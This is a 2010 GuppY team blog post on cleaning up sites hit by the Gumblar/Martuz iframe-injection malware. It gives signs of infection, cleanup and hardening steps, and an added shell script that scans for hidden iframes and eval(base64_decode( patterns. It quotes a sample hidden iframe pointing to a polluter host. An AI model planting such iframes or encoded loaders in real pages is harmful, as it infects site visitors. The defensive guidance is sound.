BloggY - News

What to do after an attack on Iframe by Gumblar, Martuz, Troj / JSRedir-R ... ?  -  by GuppYTeam
Following repeated requests on the forum, and although GuppY itself has nothing to do with the security problems caused by this worm/Trojan (which is known under several names and can attack any site regardless of how it is programmed), we give below some information to fight these nuisances:

    * Gumblar, Martuz, Troj/JSRedir-R and others spread over the Internet through infected websites, taking advantage of vulnerabilities in software that has not been updated by the administrators, webmasters, moderators or editors who have FTP access to the sites.
    * Some of the vulnerabilities identified concern out-of-date Adobe software (Adobe Acrobat Reader, Adobe Flash Player, ...), but other out-of-date software may well have exploitable flaws too.
    * If the Trojan manages to install itself on the PC of an administrator (or of a webmaster, moderator or editor) of a site because that PC has no effective, up-to-date antivirus, it steals the FTP credentials of the site, and from then on any misdeed is possible.
    * The site is in turn compromised by the attackers and then goes on to infect many others.

How do you realize that the site has been infected?

    * If your antivirus or anti-spyware displays an alert about an iframe attack.
    * If Google or another search engine warns you that your site is dangerous.
    * If your host blocks the site for that reason.
    * If your browser redirects you to a suspicious site, or asks whether you accept the redirection.
    * If you find that new files and/or directories have appeared on your FTP space without your knowledge, or that file sizes have changed.
    * ...

What's going on with the infected site ?

    * Files are altered by injected iframe tags like this one:

      <iframe src="http://site_pollueur.cn:8080/index.php" width=100 height=150 style="visibility: hidden"></iframe>

This goes unnoticed because the injected iframe is usually invisible on the site (visibility: hidden).

    * In some cases, hackers install scripts that are more or less powerful but are still able to launch attacks from your site against other sites, or even against your own server.
    * In other cases, part of the code is encoded in Base64, which gives strings like these:

      Qm9uam91cg==   which decodes to "Bonjour" (Hello)
      aWZyYW1l       which decodes to "iframe"

    * The most commonly infected files are index files with any extension (html, htm, php, ...), but any file can be affected, even images or files disguised as images!
      

What to do in case of infection?

    * You must first scan your PC with an effective, up-to-date antivirus and/or anti-spyware. Note that the first antivirus, or one of the first, to detect and block these attacks was Avast, even in its free version. At the time it was even mocked and accused of generating "false positives".
    * Update Windows, or whatever OS you have, if it is not already done.
    * Update your software (Adobe software in particular).
    * Ask all the other administrators, moderators or editors of your sites to do the same.


As regards disinfecting the site (or sites) themselves, if you work from a Windows PC and the site is on shared hosting:


    * Download the whole site locally via FTP and run the antivirus on it.
    * Look for files that appear larger than expected or whose sizes differ from the originals.
    * Search all files for suspicious strings such as iframe, hidden, ... Notepad++, among others, can do that, and can also compare two files with the same name (the original GuppY file from the pack against the copy retrieved from the infected site).
    * Replace or repair the infected files and remove any files that do not belong there.
    * Run the antivirus again.
    * Change the FTP credentials, at least the password, if possible from another PC that has not been infected.
    * Upload the disinfected files and folders back to the server.
    * Test the site online after clearing the browser cache.


If you have access to a Linux/Unix console via SSH (in the case of a dedicated server, a semi-dedicated server or a virtual private server (VPS)), or if your website is hosted at home under Linux or Unix:

    * You can search all or part of the server, or of the sites hosted on it, with the grep and find commands for the keywords listed above, or for others such as eval(base64_decode( ; Linux/Unix regulars will know how to do this.
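As an added example (not from the GuppY post), the following POSIX shell script implements the search-and-compare steps from the Windows checklist above and the grep/find advice for SSH access: it lists the files carrying the suspect strings and reports which files differ from, are missing from, or were added beyond a clean copy of the pack. The directory names and sample files are constructed for the demo.

```shell
# Added example, not part of the GuppY post: scan a downloaded site tree for
# the injection markers the post lists (hidden iframes, eval(base64_decode(,
# long base64 runs) and diff it against a clean copy of the pack.
# All file and directory names below are constructed for the demo.

# Extended regex for grep -E. Legitimate data URIs or minified JS can also
# contain long base64 runs, so review every hit by hand before deleting.
SUSPECT_RE='<iframe[^>]*(visibility: *hidden|display: *none)|eval *\( *base64_decode *\(|[A-Za-z0-9+/]{60,}={0,2}'

# List every regular file under $1 (any extension: images can carry code too)
# that contains a suspect pattern.
scan_site() {
  find "$1" -type f -exec grep -lE "$SUSPECT_RE" {} + 2>/dev/null
}

# Compare the clean pack ($1) with the site copy ($2): MODIFIED for changed
# files, MISSING for files the site lacks, EXTRA for files the pack never had.
compare_with_clean() {
  clean=$1; site=$2
  ( cd "$clean" && find . -type f ) | while read -r rel; do
    rel=${rel#./}
    if [ ! -f "$site/$rel" ]; then echo "MISSING $rel"
    elif ! cmp -s "$clean/$rel" "$site/$rel"; then echo "MODIFIED $rel"
    fi
  done
  ( cd "$site" && find . -type f ) | while read -r rel; do
    rel=${rel#./}
    [ -f "$clean/$rel" ] || echo "EXTRA $rel"
  done
}

# Constructed sample (no real malware): a two-file clean pack and a site copy
# where index.php gained a hidden iframe and a dropped file holds an eval().
build_sample() {
  root=$(mktemp -d)
  mkdir -p "$root/clean" "$root/site/img"
  printf '<?php echo "home"; ?>\n' > "$root/clean/index.php"
  printf 'body { color: black }\n' > "$root/clean/style.css"
  cp "$root/clean/style.css" "$root/site/style.css"
  printf '<?php echo "home"; ?>\n<iframe src="http://example.invalid/x.php" style="visibility: hidden"></iframe>\n' > "$root/site/index.php"
  printf '<?php eval(base64_decode("aWZyYW1l")); ?>\n' > "$root/site/img/logo.gif.php"
  echo "$root"
}

root=$(build_sample)
echo "== suspect files =="; scan_site "$root/site"
echo "== differences from the clean pack =="; compare_with_clean "$root/clean" "$root/site"
rm -rf "$root"
```

Run it on a real site by calling scan_site and compare_with_clean with your own directories instead of the constructed sample; every MODIFIED or EXTRA file deserves a look even if the regex does not flag it.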


Wise tips:

    * Keep your software up to date and ask the other site administrators to do the same.
    * Keep your antivirus and anti-spyware up to date and ask the other site administrators to do the same.
    * In particular, do not save FTP passwords in your FTP client; enter them each time.
    * Chmod as many files as possible to 444 (read only), in particular the index files and even the .htaccess files.


It is important not to chmod in this way files that must stay in read/write mode, such as data files and any others that would otherwise no longer be editable or updatable by the site.

Another drawback of chmoding to read-only is that the files will have to be put back into read/write mode (644 or 666) to apply a patch or do a migration; but that is the price to pay for some extra security.

    * There are also applications capable of eradicating these Trojans, but they are usually paid ones.

We have gleaned these explanations here and there; they are the fruit of our personal experience and cannot by any means be exhaustive, all the more so since malware is constantly changing.

For more information, type one or more of the keywords below into Google or your favourite search engine:
Iframe Gumblar Martuz Troj/JSRedir-R

Good luck in case of infections!
JeandePeyrat for GuppY Team.
Published on 02/06/2010 @ 16:19